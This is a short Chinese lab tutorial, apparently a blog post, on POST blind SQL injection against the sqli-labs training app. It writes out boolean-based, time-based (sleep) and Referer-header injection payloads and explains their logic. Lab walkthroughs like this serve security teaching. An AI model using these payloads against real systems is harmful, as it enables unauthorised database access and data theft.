1.1 POST盲注
1.1.1 布尔型盲注
1.1.1.1 burpsuite开启截断
打开http://192.168.10.159/sqli-labs/Less-15/ 后开启burpsuite截断:
1.1.1.2 提交表单数据
1.1.1.3 修改表单提交的内容进行SQL注入
修改字符串:uname=admin' and (length(database())=8) --+ &passwd=admin&submit=Submit
1.1.2 时间型盲注
修改字符串:uname=admin' and (select if(length(database())>1, sleep(3),null)) --+ &passwd=admin&submit=Submit
【字段解释】:
- if(length(database())> 1,sleep(3),null)):条件成功则睡眠3秒,否则直接返回
- length(database())> 1:判断条件
- sleep(3):当条件成功时,则执行的内容
- null:当条件不成功时执行的内容
1.1.3 Referer盲注
修改字符串:Referer: http://192.168.10.159/sqli-labs/Less-19/' or (length(database()))=9 or if(1=1,sleep(3),null) or '1'='1
【结果分析】:
(length(database())) =9 or if(1=1, sleep(3), null) or'1'= '1
语句中三个条件都为逻辑或,当第一个条件不成功时再执行第二个条件,第二个条件也不成功时则执行第三个,其中有一个条件执行成功时则不会向后继续执行。
以上实验中(length(database()))=9条件不成功,而后执行了if(1=1, sleep(3), null)条件,该条件中的判断为1=1,结果永远都是为真,而后执行sleep(3),最终页面响应时间是3秒。
我的微信
如果有技术上的问题可以扫一扫我的微信
